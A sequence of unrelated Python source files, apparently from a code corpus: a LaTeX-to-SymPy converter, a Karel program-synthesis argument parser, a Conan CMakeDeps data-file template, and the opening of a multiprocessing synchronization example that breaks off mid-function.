err = (fmt % ("I expected something else here", self.src, marker))
else:
err = fmt % ("I don't understand this", self.src, marker)
raise Exception(err)
def convert_relation(rel):
if rel.expr():
return convert_expr(rel.expr())
lh = convert_relation(rel.relation(0))
rh = convert_relation(rel.relation(1))
if rel.LT():
return sympy.StrictLessThan(lh, rh)
elif rel.LTE():
return sympy.LessThan(lh, rh)
elif rel.GT():
return sympy.StrictGreaterThan(lh, rh)
elif rel.GTE():
return sympy.GreaterThan(lh, rh)
elif rel.EQUAL():
return sympy.Eq(lh, rh)
def convert_expr(expr):
return convert_add(expr.additive())
def convert_add(add):
if add.ADD():
lh = convert_add(add.additive(0))
rh = convert_add(add.additive(1))
return sympy.Add(lh, rh, evaluate=False)
elif add.SUB():
lh = convert_add(add.additive(0))
rh = convert_add(add.additive(1))
return sympy.Add(lh, -1 * rh, evaluate=False)
else:
return convert_mp(add.mp())
def convert_mp(mp):
if hasattr(mp, 'mp'):
mp_left = mp.mp(0)
mp_right = mp.mp(1)
else:
mp_left = mp.mp_nofunc(0)
mp_right = mp.mp_nofunc(1)
if mp.MUL() or mp.CMD_TIMES() or mp.CMD_CDOT():
lh = convert_mp(mp_left)
rh = convert_mp(mp_right)
return sympy.Mul(lh, rh, evaluate=False)
elif mp.DIV() or mp.CMD_DIV() or mp.COLON():
lh = convert_mp(mp_left)
rh = convert_mp(mp_right)
return sympy.Mul(lh, sympy.Pow(rh, -1, evaluate=False), evaluate=False)
else:
if hasattr(mp, 'unary'):
return convert_unary(mp.unary())
else:
return convert_unary(mp.unary_nofunc())
def convert_unary(unary):
if hasattr(unary, 'unary'):
nested_unary = unary.unary()
else:
nested_unary = unary.unary_nofunc()
if hasattr(unary, 'postfix_nofunc'):
first = unary.postfix()
tail = unary.postfix_nofunc()
postfix = [first] + tail
else:
postfix = unary.postfix()
if unary.ADD():
return convert_unary(nested_unary)
elif unary.SUB():
return sympy.Mul(-1, convert_unary(nested_unary), evaluate=False)
elif postfix:
return convert_postfix_list(postfix)
def convert_postfix_list(arr, i=0):
if i >= len(arr):
raise Exception("Index out of bounds")
res = convert_postfix(arr[i])
if isinstance(res, sympy.Expr):
if i == len(arr) - 1:
return res # nothing to multiply by
else:
if i > 0:
left = convert_postfix(arr[i - 1])
right = convert_postfix(arr[i + 1])
if isinstance(left, sympy.Expr) and isinstance(right, sympy.Expr):
left_syms = convert_postfix(arr[i - 1]).atoms(sympy.Symbol)
right_syms = convert_postfix(arr[i + 1]).atoms(sympy.Symbol)
# if the left and right sides contain no variables and the
# symbol in between is 'x', treat as multiplication.
if len(left_syms) == 0 and len(right_syms) == 0 and str(res) == "x":
return convert_postfix_list(arr, i + 1)
# multiply by next
return sympy.Mul(res, convert_postfix_list(arr, i + 1), evaluate=False)
else: # must be derivative
wrt = res[0]
if i == len(arr) - 1:
raise Exception("Expected expression for derivative")
else:
expr = convert_postfix_list(arr, i + 1)
return sympy.Derivative(expr, wrt)
def do_subs(expr, at):
if at.expr():
at_expr = convert_expr(at.expr())
syms = at_expr.atoms(sympy.Symbol)
if len(syms) == 0:
return expr
elif len(syms) > 0:
sym = next(iter(syms))
return expr.subs(sym, at_expr)
elif at.equality():
lh = convert_expr(at.equality().expr(0))
rh = convert_expr(at.equality().expr(1))
return expr.subs(lh, rh)
def convert_postfix(postfix):
if hasattr(postfix, 'exp'):
exp_nested = postfix.exp()
else:
exp_nested = postfix.exp_nofunc()
exp = convert_exp(exp_nested)
for op in postfix.postfix_op():
if op.BANG():
if isinstance(exp, list):
raise Exception("Cannot apply postfix to derivative")
exp = sympy.factorial(exp, evaluate=False)
elif op.eval_at():
ev = op.eval_at()
at_b = None
at_a = None
if ev.eval_at_sup():
at_b = do_subs(exp, ev.eval_at_sup())
if ev.eval_at_sub():
at_a = do_subs(exp, ev.eval_at_sub())
if at_b != None and at_a != None:
exp = sympy.Add(at_b, -1 * at_a, evaluate=False)
elif at_b != None:
exp = at_b
elif at_a != None:
exp = at_a
return exp
def convert_exp(exp):
if hasattr(exp, 'exp'):
exp_nested = exp.exp()
else:
exp_nested = exp.exp_nofunc()
if exp_nested:
base = convert_exp(exp_nested)
if isinstance(base, list):
raise Exception("Cannot raise derivative to power")
if exp.atom():
exponent = convert_atom(exp.atom())
elif exp.expr():
exponent = convert_expr(exp.expr())
return sympy.Pow(base, exponent, evaluate=False)
else:
if hasattr(exp, 'comp'):
return convert_comp(exp.comp())
else:
return convert_comp(exp.comp_nofunc())
def convert_comp(comp):
if comp.group():
return convert_expr(comp.group().expr())
elif comp.abs_group():
return sympy.Abs(convert_expr(comp.abs_group().expr()), evaluate=False)
elif comp.atom():
return convert_atom(comp.atom())
elif comp.frac():
return convert_frac(comp.frac())
elif comp.func():
return convert_func(comp.func())
def convert_atom(atom):
if atom.LETTER():
subscriptName = ''
if atom.subexpr():
subscript = None
if atom.subexpr().expr(): # subscript is expr
subscript = convert_expr(atom.subexpr().expr())
else: # subscript is atom
subscript = convert_atom(atom.subexpr().atom())
subscriptName = '_{' + StrPrinter().doprint(subscript) + '}'
return sympy.Symbol(atom.LETTER().getText() + subscriptName)
elif atom.SYMBOL():
s = atom.SYMBOL().getText()[1:]
if s == "infty":
return sympy.oo
else:
if atom.subexpr():
subscript = None
if atom.subexpr().expr(): # subscript is expr
subscript = convert_expr(atom.subexpr().expr())
else: # subscript is atom
subscript = convert_atom(atom.subexpr().atom())
subscriptName = StrPrinter().doprint(subscript)
s += '_{' + subscriptName + '}'
return sympy.Symbol(s)
elif atom.NUMBER():
s = atom.NUMBER().getText().replace(",", "")
return sympy.Number(s)
elif atom.DIFFERENTIAL():
var = get_differential_var(atom.DIFFERENTIAL())
return sympy.Symbol('d' + var.name)
elif atom.mathit():
text = rule2text(atom.mathit().mathit_text())
return sympy.Symbol(text)
def rule2text(ctx):
stream = ctx.start.getInputStream()
# starting index of starting token
startIdx = ctx.start.start
# stopping index of stopping token
stopIdx = ctx.stop.stop
return stream.getText(startIdx, stopIdx)
def convert_frac(frac):
diff_op = False
partial_op = False
lower_itv = frac.lower.getSourceInterval()
lower_itv_len = lower_itv[1] - lower_itv[0] + 1
if (frac.lower.start == frac.lower.stop and
frac.lower.start.type == PSLexer.DIFFERENTIAL):
wrt = get_differential_var_str(frac.lower.start.text)
diff_op = True
elif (lower_itv_len == 2 and
frac.lower.start.type == PSLexer.SYMBOL and
frac.lower.start.text == '\\partial' and
(frac.lower.stop.type == PSLexer.LETTER or frac.lower.stop.type == PSLexer.SYMBOL)):
partial_op = True
wrt = frac.lower.stop.text
if frac.lower.stop.type == PSLexer.SYMBOL:
wrt = wrt[1:]
if diff_op or partial_op:
wrt = sympy.Symbol(wrt)
if (diff_op and frac.upper.start == frac.upper.stop and
frac.upper.start.type == PSLexer.LETTER and
frac.upper.start.text == 'd'):
return [wrt]
elif (partial_op and frac.upper.start == frac.upper.stop and
frac.upper.start.type == PSLexer.SYMBOL and
frac.upper.start.text == '\\partial'):
return [wrt]
upper_text = rule2text(frac.upper)
expr_top = None
if diff_op and upper_text.startswith('d'):
expr_top = process_sympy(upper_text[1:])
elif partial_op and frac.upper.start.text == '\\partial':
expr_top = process_sympy(upper_text[len('\\partial'):])
if expr_top:
return sympy.Derivative(expr_top, wrt)
expr_top = convert_expr(frac.upper)
expr_bot = convert_expr(frac.lower)
return sympy.Mul(expr_top, sympy.Pow(expr_bot, -1, evaluate=False), evaluate=False)
def convert_func(func):
if func.func_normal():
if func.L_PAREN(): # function called with parenthesis
arg = convert_func_arg(func.func_arg())
else:
arg = convert_func_arg(func.func_arg_noparens())
name = func.func_normal().start.text[1:]
# change arc<trig> -> a<trig>
if name in ["arcsin", "arccos", "arctan", "arccsc", "arcsec",
"arccot"]:
name = "a" + name[3:]
expr = getattr(sympy.functions, name)(arg, evaluate=False)
if name in ["arsinh", "arcosh", "artanh"]:
name = "a" + name[2:]
expr = getattr(sympy.functions, name)(arg, evaluate=False)
if (name=="log" or name=="ln"):
if func.subexpr():
base = convert_expr(func.subexpr().expr())
elif name == "log":
base = 10
elif name == "ln":
base = sympy.E
expr = sympy.log(arg, base, evaluate=False)
func_pow = None
should_pow = True
if func.supexpr():
if func.supexpr().expr():
func_pow = convert_expr(func.supexpr().expr())
else:
func_pow = convert_atom(func.supexpr().atom())
if name in ["sin", "cos", "tan", "csc", "sec", "cot", "sinh", "cosh", "tanh"]:
if func_pow == -1:
name = "a" + name
should_pow = False
expr = getattr(sympy.functions, name)(arg, evaluate=False)
if func_pow and should_pow:
expr = sympy.Pow(expr, func_pow, evaluate=False)
return expr
elif func.LETTER() or func.SYMBOL():
if func.LETTER():
fname = func.LETTER().getText()
elif func.SYMBOL():
fname = func.SYMBOL().getText()[1:]
fname = str(fname) # can't be unicode
if func.subexpr():
subscript = None
if func.subexpr().expr(): # subscript is expr
subscript = convert_expr(func.subexpr().expr())
else: # subscript is atom
subscript = convert_atom(func.subexpr().atom())
subscriptName = StrPrinter().doprint(subscript)
fname += '_{' + subscriptName + '}'
input_args = func.args()
output_args = []
while input_args.args(): # handle multiple arguments to function
output_args.append(convert_expr(input_args.expr()))
input_args = input_args.args()
output_args.append(convert_expr(input_args.expr()))
return sympy.Function(fname)(*output_args)
elif func.FUNC_INT():
return handle_integral(func)
elif func.FUNC_SQRT():
expr = convert_expr(func.base)
if func.root:
r = convert_expr(func.root)
return sympy.root(expr, r)
else:
return sympy.sqrt(expr)
elif func.FUNC_SUM():
return handle_sum_or_prod(func, "summation")
elif func.FUNC_PROD():
return handle_sum_or_prod(func, "product")
elif func.FUNC_LIM():
return handle_limit(func)
def convert_func_arg(arg):
if hasattr(arg, 'expr'):
return convert_expr(arg.expr())
else:
return convert_mp(arg.mp_nofunc())
def handle_integral(func):
if func.additive():
integrand = convert_add(func.additive())
elif func.frac():
integrand = convert_frac(func.frac())
else:
integrand = 1
int_var = None
if func.DIFFERENTIAL():
int_var = get_differential_var(func.DIFFERENTIAL())
else:
for sym in integrand.atoms(sympy.Symbol):
s = str(sym)
if len(s) > 1 and s[0] == 'd':
if s[1] == '\\':
int_var = sympy.Symbol(s[2:])
else:
int_var = sympy.Symbol(s[1:])
int_sym = sym
if int_var:
integrand = integrand.subs(int_sym, 1)
else:
# Assume dx by default
int_var = sympy.Symbol('x')
if func.subexpr():
if func.subexpr().atom():
lower = convert_atom(func.subexpr().atom())
else:
lower = convert_expr(func.subexpr().expr())
if func.supexpr().atom():
upper = convert_atom(func.supexpr().atom())
else:
upper = convert_expr(func.supexpr().expr())
return sympy.Integral(integrand, (int_var, lower, upper))
else:
return sympy.Integral(integrand, int_var)
def handle_sum_or_prod(func, name):
val = convert_mp(func.mp())
iter_var = convert_expr(func.subeq().equality().expr(0))
start = convert_expr(func.subeq().equality().expr(1))
if func.supexpr().expr(): # ^{expr}
end = convert_expr(func.supexpr().expr())
else: # ^atom
end = convert_atom(func.supexpr().atom())
if name == "summation":
return sympy.Sum(val, (iter_var, start, end))
elif name == "product":
return sympy.Product(val, (iter_var, start, end))
def handle_limit(func):
sub = func.limit_sub()
if sub.LETTER():
var = sympy.Symbol(sub.LETTER().getText())
elif sub.SYMBOL():
var = sympy.Symbol(sub.SYMBOL().getText()[1:])
else:
var = sympy.Symbol('x')
if sub.SUB():
direction = "-"
else:
direction = "+"
approaching = convert_expr(sub.expr())
content = convert_mp(func.mp())
return sympy.Limit(content, var, approaching, direction)
def get_differential_var(d):
text = get_differential_var_str(d.getText())
return sympy.Symbol(text)
def get_differential_var_str(text):
for i in range(1, len(text)):
c = text[i]
if not (c == " " or c == "\r" or c == "\n" or c == "\t"):
idx = i
break
text = text[idx:]
if text[0] == "\\":
text = text[1:]
return text
def test_sympy():
print process_sympy("e^{(45 + 2)}")
print process_sympy("e + 5")
print process_sympy("5 + e")
print process_sympy("e")
print process_sympy("\\frac{dx}{dy} \\int y x^2 dy")
print process_sympy("\\frac{dx}{dy} 5")
print process_sympy("\\frac{d}{dx} \\int x^2 dx")
print process_sympy("\\frac{dx}{dy} \\int x^2 dx")
print process_sympy("\\frac{d}{dy} x^2 + x y = 0")
print process_sympy("\\frac{d}{dy} x^2 + x y = 2")
print process_sympy("\\frac{d x^3}{dy}")
print process_sympy("\\frac{d x^3}{dy} + x^3")
print process_sympy("\\int^{5x}_{2} x^2 dy")
print process_sympy("\\int_{5x}^{2} x^2 dx")
print process_sympy("\\int x^2 dx")
print process_sympy("2 4 5 - 2 3 1")
if __name__ == "__main__":
test_sympy()
|
program_synthesis/karel/arguments.py | kavigupta/program_synthesis | 123 | 11195388 | <filename>program_synthesis/karel/arguments.py
import torch
import argparse
import time
def get_arg_parser(title, mode):
parser = argparse.ArgumentParser(description=title)
parser.add_argument('--no-cuda', action='store_true', default=False)
parser.add_argument('--verbose', action='store_true', default=False)
parser.add_argument('--model_type', type=str, default='seq2tree')
parser.add_argument('--model_dir', type=str, default='models/%d' % int(time.time()))
parser.add_argument('--dataset', type=str, default='wikisql')
parser.add_argument('--dataset_max_size', type=int, default=0)
parser.add_argument('--dataset_max_code_length', type=int, default=0)
parser.add_argument('--dataset_filter_code_length', type=int, default=0)
parser.add_argument('--dataset_bucket', action='store_true', default=False)
parser.add_argument('--vocab_min_freq', type=int, default=50)
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--load-sync', action='store_true')
parser.add_argument('--karel-edit-data-beam', type=int, default=5)
parser.add_argument(
'--pretrained', type=str, default='',
help='Use format "encoder:path/to/checkpoint,decoder:path/to/other/checkpoint"')
if mode == 'train':
train_group = parser.add_argument_group('train')
train_group.add_argument('--save_every_n', type=int, default=100)
train_group.add_argument('--keep_every_n', type=int, default=10000000)
train_group.add_argument('--debug_every_n', type=int, default=20)
train_group.add_argument('--eval_every_n', type=int, default=1000)
train_group.add_argument('--eval_n_steps', type=int, default=50)
train_group.add_argument('--log_interval', type=int, default=20)
train_group.add_argument('--optimizer', type=str, default='adam')
train_group.add_argument('--lr', type=float, default=.001)
train_group.add_argument('--lr_decay_steps', type=int)
train_group.add_argument('--lr_decay_rate', type=float)
train_group.add_argument('--gradient-clip', type=float)
train_group.add_argument('--n_warmup_steps', type=int, default=4000)
train_group.add_argument('--num_epochs', type=int, default=10)
train_group.add_argument('--num_units', type=int, default=100)
train_group.add_argument('--num_placeholders', type=int, default=100)
train_group.add_argument('--num-att-heads', type=int, default=8)
train_group.add_argument('--bidirectional', action='store_true', default=False)
train_group.add_argument('--read-code', dest='read_code', action='store_true', default=False)
train_group.add_argument('--read-text', dest='read_text', action='store_true', default=True)
train_group.add_argument('--skip-text', dest='read_text', action='store_false')
train_group.add_argument('--read-io', dest='read_io', action='store_true', default=False)
train_group.add_argument('--skip-io', dest='read_io', action='store_false')
train_group.add_argument('--io-count', type=int, default=3)
# REINFORCE.
train_group.add_argument('--reinforce', action='store_true', default=False)
train_group.add_argument(
'--reinforce-step', type=int, default=0,
help='Step after which start to use reinforce')
train_group.add_argument(
'--reinforce-beam-size', type=int, default=100,
help='Size of beam to evalutate when using reinforce'
)
# Additional reporting.
train_group.add_argument('--report_per_length', action='store_true', default=False)
# REFINE.
train_group.add_argument('--refine', action='store_true', default=False)
train_group.add_argument(
'--refine-beam', type=int, default=10,
help='Beam size to use while decoding to generate candidate code for training the refinement model.')
train_group.add_argument(
'--refine-samples', type=int, default=100000,
help='# Number of refinement training samples to keep in the buffer.')
train_group.add_argument('--refine-min-items', type=int, default=128)
train_group.add_argument(
'--refine-frac', type=float, default=0.5,
help='Fraction of time we should sample refinement data for training.')
train_group.add_argument(
'--refine-warmup-steps', type=int, default=1000,
help='Number of steps we should train before we sample any code to generate the refinement dataset.')
train_group.add_argument(
'--refine-sample-frac', type=float, default=0.1,
help='Fraction of batches for which we should sample code to add to the refinement data for training.')
train_group.add_argument('--batch-create-train', type=str, default='ConstantBatch(5, 1, False)')
train_group.add_argument('--batch-create-eval', type=str, default='ConstantBatch(5, 1, False)')
train_group.add_argument('--karel-trace-enc', default='lstm')
train_group.add_argument('--karel-code-enc', default='default')
train_group.add_argument('--karel-code-update', default='default')
train_group.add_argument('--karel-code-update-steps', default=0,
type=int)
train_group.add_argument('--karel-refine-dec', default='default')
train_group.add_argument('--karel-trace-usage', default='memory')
train_group.add_argument('--karel-trace-top-k', default=1, type=int)
train_group.add_argument('--karel-code-usage', default='memory')
train_group.add_argument('--karel-io-enc', default='lgrl')
train_group.add_argument('--karel-io-conv-blocks', default=2, type=int)
train_group.add_argument('--karel-trace-action-enc', default='emb')
train_group.add_argument('--karel-trace-grid-enc', default='presnet')
train_group.add_argument('--karel-trace-cond-enc', default='concat')
train_group.add_argument('--karel-code-dec', default='latepool')
train_group.add_argument('--karel-merge-io', default='max')
train_group.add_argument('--karel-train-shuf', default=False, action='store_true')
elif mode == 'eval':
eval_group = parser.add_argument_group('eval')
eval_group.add_argument('--tag', type=str, default='')
eval_group.add_argument('--example-id', type=int, default=None)
eval_group.add_argument('--step', type=int, default=None)
eval_group.add_argument('--refine-iters', type=int, default=1)
eval_group.add_argument('--eval-train', action='store_true', default=False)
eval_group.add_argument('--hide-example-info', action='store_true', default=False)
eval_group.add_argument('--report-path')
eval_group.add_argument('--eval-final', action='store_true')
eval_group.add_argument('--infer-output')
eval_group.add_argument('--infer-limit', type=int)
eval_group.add_argument('--save-beam-outputs', action='store_true')
else:
raise ValueError(mode)
infer_group = parser.add_argument_group('infer')
infer_group.add_argument('--train-data-path', default='')
infer_group.add_argument('--eval-data-path', type=str, default='')
infer_group.add_argument('--max_decoder_length', type=int, default=100)
infer_group.add_argument('--max_beam_trees', type=int, default=100)
infer_group.add_argument('--max_beam_iter', type=int, default=1000)
infer_group.add_argument('--max_eval_trials', type=int)
infer_group.add_argument('--min_prob_threshold', type=float, default=1e-5)
infer_group.add_argument('--search-bfs', action='store_true', default=True)
infer_group.add_argument('--karel-mutate-ref', action='store_true')
infer_group.add_argument('--karel-mutate-n-dist')
infer_group.add_argument('--karel-trace-inc-val', action='store_true')
runtime_group = parser.add_argument_group('runtime')
runtime_group.add_argument(
'--restore-map-to-cpu', action='store_true', default=False)
return parser
def parse(title, mode):
parser = get_arg_parser(title, mode)
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
return args
def backport_default_args(args):
"""Backport default args."""
backport = {
"restore_map_to_cpu": False,
"keep_every_n": 10000000,
"read_text": True,
"read_io": False,
"io_count": 3,
"refine": False,
"read_code": False,
"optimizer": "adam",
"dataset_filter_code_length": 0,
"karel_trace_usage": "memory",
"karel_code_usage": "memory",
"karel_refine_dec": "default",
"karel_io_enc": "lgrl",
"karel_trace_inc_val": True,
}
for key, value in backport.items():
if not hasattr(args, key):
setattr(args, key, value)
|
conan/tools/cmake/cmakedeps/templates/target_data.py | fanStefan/conan | 6,205 | 11195389 | <reponame>fanStefan/conan<filename>conan/tools/cmake/cmakedeps/templates/target_data.py
import os
import textwrap
from conan.tools.cmake.cmakedeps.templates import CMakeDepsFileTemplate
from conan.tools.cmake.utils import get_file_name
"""
foo-release-x86_64-data.cmake
"""
class ConfigDataTemplate(CMakeDepsFileTemplate):
@property
def filename(self):
data_fname = "" if not self.find_module_mode else "module-"
data_fname += "{}-{}".format(self.file_name, self.configuration.lower())
if self.arch:
data_fname += "-{}".format(self.arch)
data_fname += "-data.cmake"
return data_fname
@property
def context(self):
global_cpp = self.get_global_cpp_cmake()
if not self.build_modules_activated:
global_cpp.build_modules_paths = ""
components_cpp = self.get_required_components_cpp()
components_renames = " ".join([component_rename for component_rename, _ in
reversed(components_cpp)])
# For the build requires, we don't care about the transitive (only runtime for the br)
# so as the xxx-conf.cmake files won't be generated, don't include them as find_dependency
# This is because in Conan 2.0 model, only the pure tools like CMake will be build_requires
# for example a framework test won't be a build require but a "test/not public" require.
dependency_filenames = self._get_dependency_filenames()
package_folder = self.conanfile.package_folder.replace('\\', '/')\
.replace('$', '\\$').replace('"', '\\"')
return {"global_cpp": global_cpp,
"pkg_name": self.pkg_name,
"package_folder": package_folder,
"config_suffix": self.config_suffix,
"components_renames": components_renames,
"components_cpp": components_cpp,
"dependency_filenames": " ".join(dependency_filenames)}
@property
def template(self):
# This will be at: XXX-release-data.cmake
ret = textwrap.dedent("""\
########### AGGREGATED COMPONENTS AND DEPENDENCIES FOR THE MULTI CONFIG #####################
#############################################################################################
set({{ pkg_name }}_COMPONENT_NAMES {{ '${'+ pkg_name }}_COMPONENT_NAMES} {{ components_renames }})
list(REMOVE_DUPLICATES {{ pkg_name }}_COMPONENT_NAMES)
set({{ pkg_name }}_FIND_DEPENDENCY_NAMES {{ '${'+ pkg_name }}_FIND_DEPENDENCY_NAMES} {{ dependency_filenames }})
list(REMOVE_DUPLICATES {{ pkg_name }}_FIND_DEPENDENCY_NAMES)
########### VARIABLES #######################################################################
#############################################################################################
set({{ pkg_name }}_PACKAGE_FOLDER{{ config_suffix }} "{{ package_folder }}")
set({{ pkg_name }}_INCLUDE_DIRS{{ config_suffix }} {{ global_cpp.include_paths }})
set({{ pkg_name }}_RES_DIRS{{ config_suffix }} {{ global_cpp.res_paths }})
set({{ pkg_name }}_DEFINITIONS{{ config_suffix }} {{ global_cpp.defines }})
set({{ pkg_name }}_SHARED_LINK_FLAGS{{ config_suffix }} {{ global_cpp.sharedlinkflags_list }})
set({{ pkg_name }}_EXE_LINK_FLAGS{{ config_suffix }} {{ global_cpp.exelinkflags_list }})
set({{ pkg_name }}_OBJECTS{{ config_suffix }} {{ global_cpp.objects_list }})
set({{ pkg_name }}_COMPILE_DEFINITIONS{{ config_suffix }} {{ global_cpp.compile_definitions }})
set({{ pkg_name }}_COMPILE_OPTIONS_C{{ config_suffix }} {{ global_cpp.cflags_list }})
set({{ pkg_name }}_COMPILE_OPTIONS_CXX{{ config_suffix }} {{ global_cpp.cxxflags_list}})
set({{ pkg_name }}_LIB_DIRS{{ config_suffix }} {{ global_cpp.lib_paths }})
set({{ pkg_name }}_LIBS{{ config_suffix }} {{ global_cpp.libs }})
set({{ pkg_name }}_SYSTEM_LIBS{{ config_suffix }} {{ global_cpp.system_libs }})
set({{ pkg_name }}_FRAMEWORK_DIRS{{ config_suffix }} {{ global_cpp.framework_paths }})
set({{ pkg_name }}_FRAMEWORKS{{ config_suffix }} {{ global_cpp.frameworks }})
set({{ pkg_name }}_BUILD_MODULES_PATHS{{ config_suffix }} {{ global_cpp.build_modules_paths }})
set({{ pkg_name }}_BUILD_DIRS{{ config_suffix }} {{ global_cpp.build_paths }})
set({{ pkg_name }}_COMPONENTS{{ config_suffix }} {{ components_renames }})
{%- for comp_name, cpp in components_cpp %}
########### COMPONENT {{ comp_name }} VARIABLES #############################################
set({{ pkg_name }}_{{ comp_name }}_INCLUDE_DIRS{{ config_suffix }} {{ cpp.include_paths }})
set({{ pkg_name }}_{{ comp_name }}_LIB_DIRS{{ config_suffix }} {{ cpp.lib_paths }})
set({{ pkg_name }}_{{ comp_name }}_RES_DIRS{{ config_suffix }} {{ cpp.res_paths }})
set({{ pkg_name }}_{{ comp_name }}_DEFINITIONS{{ config_suffix }} {{ cpp.defines }})
set({{ pkg_name }}_{{ comp_name }}_OBJECTS{{ config_suffix }} {{ cpp.objects_list }})
set({{ pkg_name }}_{{ comp_name }}_COMPILE_DEFINITIONS{{ config_suffix }} {{ cpp.compile_definitions }})
set({{ pkg_name }}_{{ comp_name }}_COMPILE_OPTIONS_C{{ config_suffix }} "{{ cpp.cflags_list }}")
set({{ pkg_name }}_{{ comp_name }}_COMPILE_OPTIONS_CXX{{ config_suffix }} "{{ cpp.cxxflags_list }}")
set({{ pkg_name }}_{{ comp_name }}_LIBS{{ config_suffix }} {{ cpp.libs }})
set({{ pkg_name }}_{{ comp_name }}_SYSTEM_LIBS{{ config_suffix }} {{ cpp.system_libs }})
set({{ pkg_name }}_{{ comp_name }}_FRAMEWORK_DIRS{{ config_suffix }} {{ cpp.framework_paths }})
set({{ pkg_name }}_{{ comp_name }}_FRAMEWORKS{{ config_suffix }} {{ cpp.frameworks }})
set({{ pkg_name }}_{{ comp_name }}_DEPENDENCIES{{ config_suffix }} {{ cpp.public_deps }})
set({{ pkg_name }}_{{ comp_name }}_LINKER_FLAGS{{ config_suffix }}
$<$<STREQUAL:$<TARGET_PROPERTY:TYPE>,SHARED_LIBRARY>:{{ cpp.sharedlinkflags_list }}>
$<$<STREQUAL:$<TARGET_PROPERTY:TYPE>,MODULE_LIBRARY>:{{ cpp.sharedlinkflags_list }}>
$<$<STREQUAL:$<TARGET_PROPERTY:TYPE>,EXECUTABLE>:{{ cpp.exelinkflags_list }}>
)
{%- endfor %}
""")
return ret
def get_global_cpp_cmake(self):
global_cppinfo = self.conanfile.cpp_info.copy()
global_cppinfo.aggregate_components()
pfolder_var_name = "{}_PACKAGE_FOLDER{}".format(self.pkg_name, self.config_suffix)
return DepsCppCmake(global_cppinfo, pfolder_var_name)
def get_required_components_cpp(self):
"""Returns a list of (component_name, DepsCppCMake)"""
ret = []
sorted_comps = self.conanfile.cpp_info.get_sorted_components()
direct_visible_host = self.conanfile.dependencies.filter({"build": False, "visible": True,
"direct": True})
for comp_name, comp in sorted_comps.items():
pfolder_var_name = "{}_PACKAGE_FOLDER{}".format(self.pkg_name, self.config_suffix)
deps_cpp_cmake = DepsCppCmake(comp, pfolder_var_name)
public_comp_deps = []
for require in comp.requires:
if "::" in require: # Points to a component of a different package
pkg, cmp_name = require.split("::")
req = direct_visible_host[pkg]
public_comp_deps.append("{}::{}".format(self.get_target_namespace(req),
self.get_component_alias(req, cmp_name)))
else: # Points to a component of same package
public_comp_deps.append("{}::{}".format(self.target_namespace,
self.get_component_alias(self.conanfile,
require)))
deps_cpp_cmake.public_deps = " ".join(public_comp_deps)
component_rename = self.get_component_alias(self.conanfile, comp_name)
ret.append((component_rename, deps_cpp_cmake))
ret.reverse()
return ret
def _get_dependency_filenames(self):
if self.conanfile.is_build_context:
return []
ret = []
direct_host = self.conanfile.dependencies.filter({"build": False, "visible": True,
"direct": True})
if self.conanfile.cpp_info.required_components:
for dep_name, _ in self.conanfile.cpp_info.required_components:
if dep_name and dep_name not in ret: # External dep
req = direct_host[dep_name]
ret.append(get_file_name(req, self.find_module_mode))
elif direct_host:
ret = [get_file_name(r, self.find_module_mode) for r in direct_host.values()]
return ret
class DepsCppCmake(object):
def __init__(self, cpp_info, pfolder_var_name):
def join_paths(paths):
"""
Paths are doubled quoted, and escaped (but spaces)
e.g: set(LIBFOO_INCLUDE_DIRS "/path/to/included/dir" "/path/to/included/dir2")
"""
ret = []
for p in paths:
norm_path = p.replace('\\', '/').replace('$', '\\$').replace('"', '\\"')
if os.path.isabs(p):
ret.append('"{}"'.format(norm_path))
else:
# Prepend the {{ pkg_name }}_PACKAGE_FOLDER{{ config_suffix }}
ret.append('"${%s}/%s"' % (pfolder_var_name, norm_path))
return "\n\t\t\t".join(ret)
def join_flags(separator, values):
# Flags have to be escaped
return separator.join(v.replace('\\', '\\\\').replace('$', '\\$').replace('"', '\\"')
for v in values)
def join_defines(values, prefix=""):
# Defines have to be escaped, included spaces
return "\n\t\t\t".join('"%s%s"' % (prefix, v.replace('\\', '\\\\').replace('$', '\\$').
replace('"', '\\"'))
for v in values)
def join_paths_single_var(values):
"""
semicolon-separated list of dirs:
e.g: set(LIBFOO_INCLUDE_DIR "/path/to/included/dir;/path/to/included/dir2")
"""
return '"%s"' % ";".join(p.replace('\\', '/').replace('$', '\\$') for p in values)
self.include_paths = join_paths(cpp_info.includedirs)
self.include_path = join_paths_single_var(cpp_info.includedirs)
self.lib_paths = join_paths(cpp_info.libdirs)
self.res_paths = join_paths(cpp_info.resdirs)
self.bin_paths = join_paths(cpp_info.bindirs)
self.build_paths = join_paths(cpp_info.builddirs)
self.src_paths = join_paths(cpp_info.srcdirs)
self.framework_paths = join_paths(cpp_info.frameworkdirs)
self.libs = join_flags(" ", cpp_info.libs)
self.system_libs = join_flags(" ", cpp_info.system_libs)
self.frameworks = join_flags(" ", cpp_info.frameworks)
self.defines = join_defines(cpp_info.defines, "-D")
self.compile_definitions = join_defines(cpp_info.defines)
# For modern CMake targets we need to prepare a list to not
# loose the elements in the list by replacing " " with ";". Example "-framework Foundation"
# Issue: #1251
self.cxxflags_list = join_flags(";", cpp_info.cxxflags)
self.cflags_list = join_flags(";", cpp_info.cflags)
# linker flags without magic: trying to mess with - and / =>
# https://github.com/conan-io/conan/issues/8811
# frameworks should be declared with cppinfo.frameworks not "-framework Foundation"
self.sharedlinkflags_list = join_flags(";", cpp_info.sharedlinkflags)
self.exelinkflags_list = join_flags(";", cpp_info.exelinkflags)
self.objects_list = join_paths(cpp_info.objects)
build_modules = cpp_info.get_property("cmake_build_modules", "CMakeDeps") or []
self.build_modules_paths = join_paths(build_modules)
|
py2.5/examples/ex_synchronize.py | geofft/multiprocess | 356 | 11195401 | #
# A test file for the `processing` package
#
import time, sys, random
from Queue import Empty
import processing # may get overwritten
#### TEST_VALUE
def value_func(running, mutex):
random.seed()
time.sleep(random.random()*4)
mutex.acquire()
print '\n\t\t\t' + str(processing.currentProcess()) + ' has finished'
running.value -= 1
mutex.release()
def test_value():
TASKS = 10
running = processing.Value('i', TASKS)
mutex = processing.Lock()
for i in range(TASKS):
processing.Process(target=value_func, args=(running, mutex)).start()
while running.value > 0:
time.sleep(0.08)
mutex.acquire()
print running.value,
sys.stdout.flush()
mutex.release()
print
print 'No more running processes'
#### TEST_QUEUE
def queue_func(queue):
for i in range(30):
time.sleep(0.5 * random.random())
queue.put(i*i)
queue.put('STOP')
def test_queue():
q = processing.Queue()
p = processing.Process(target=queue_func, args=(q,))
p.start()
o = None
while o != 'STOP':
try:
o = q.get(timeout=0.3)
print o,
sys.stdout.flush()
except Empty:
print 'TIMEOUT'
print
#### TEST_CONDITION
def condition_func(cond):
